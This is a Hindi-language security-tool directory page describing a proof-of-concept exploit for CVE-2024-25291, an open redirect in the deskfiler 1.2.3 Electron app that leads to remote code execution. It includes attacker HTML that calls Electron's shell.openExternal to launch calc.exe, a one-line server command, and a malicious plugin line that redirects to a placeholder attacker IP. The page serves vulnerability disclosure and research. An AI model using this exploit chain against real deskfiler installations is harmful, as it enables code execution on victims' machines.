Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-25291 — deskfiler 1.2.3 Open Redirect exploit | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2024-25291
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubeqstlab/cve-2024-25291

CVE-2024-25291

deskfiler 1.2.3 Open Redirect exploit

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

DeskFiler RCE

CVE-2024-25291 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।

deskfiler - 1.2.3 एप्लिकेशन में इलेक्ट्रॉन वेबव्यू की अनुमति देता है, जिसके परिणामस्वरूप रिमोट कोड इस रिपॉजिटरी में एक उदाहरण भेद्य एप्लिकेशन और इसका प्रूफ-ऑफ-कॉन्सेप्ट (POC) शोषण है।

एक PoC के रूप में एक पायथन फ़ाइल है जो प्रक्रिया को स्वचालित करती है।

1.भेद्यता अवलोकन:

  • भेद्यता विषय: RCE के माध्यम से ओपन रिडायरेक्ट
  • भेद्यता संस्करण: deskfiler-1.2.3
  • समस्या का प्रकटीकरण: इलेक्ट्रॉन वेबव्यू
  • हमले का प्रकार: रिमोट कोड निष्पादन
  • हमले के वेक्टर: भेद्यता का शोषण करने के लिए, किसी को प्लग-इन खोलना होगा।
  • आरक्षित CVE संख्या: CVE-2024-25291

2. भेद्यता का कारण:

  • शोषण स्पष्टीकरण
    • एप्लिकेशन के एक विशिष्ट अनुभाग में, इलेक्ट्रॉन के माध्यम से एक वेबव्यू के माध्यम से एक बाहरी लिंक तक पहुँचने वाले अनुभाग की पुष्टि की जा सकती है। इसलिए, इसके माध्यम से, हमलावर के सर्वर से कनेक्ट करके RCE प्राप्त करना संभव है।

प्रूफ-ऑफ-कॉन्सेप्ट (POC)

  • चरण 1) हमलावर का सर्वर तैयार करें और दुर्भावनापूर्ण प्लग-इन बनाएं।
root@kitploit:~
<html>
 <head>
 <title>jruru</title>
 </head>
 <body>
 <script>
 const { shell } = require('electron');
 shell.openExternal('file:C:/Windows/System32/calc.exe');
 </script>
 </body>
 </html>

※ यदि आप इसे जल्दी से परीक्षण करना चाहते हैं, तो निम्नलिखित कोड के साथ हमलावर के PC पर एक सर्वर बनाएं।

root@kitploit:~
$ python -m http.server 80

नोट: ※ इस समय, यह माना जाता है कि प्लग-इन हमलावर द्वारा उत्पन्न एक प्लग-इन है, और यह केवल एक सामान्य प्लग-इन है जिसमें हमलावर सर्वर तक पहुँचने के लिए कोड जोड़ा गया है। सरल परीक्षण के लिए BareBone चुना गया है। deskfiler1

उसके बाद, BareBone फ़ोल्डर पथ में index.js फ़ाइल में निम्नलिखित कोड जोड़ें।

root@kitploit:~
window.location='http://[attacker_ip]/hack.html'
  • चरण 2) पीड़ित के सर्वर पर, Deskfiler चलाएँ और "Add new plugin" के माध्यम से BareBone प्लग-इन स्थापित करें। deskfiler2

deskfiler3


3. अतिरिक्त जानकारी

इस PoC में, हमने एक प्लग-इन का उपयोग किया; हालांकि, हम मानते हैं कि वैकल्पिक हमले वैक्टर के साथ, स्वतंत्र रूप से रिमोट कोड निष्पादन (RCE) प्राप्त करना संभव है। इसके अतिरिक्त, यदि सर्वर-साइड भेद्यताएं जैसे Stored XSS, Reflected XSS मौजूद हैं, तो RCE भी संभव माना जाता है।

टूल डाउनलोड करें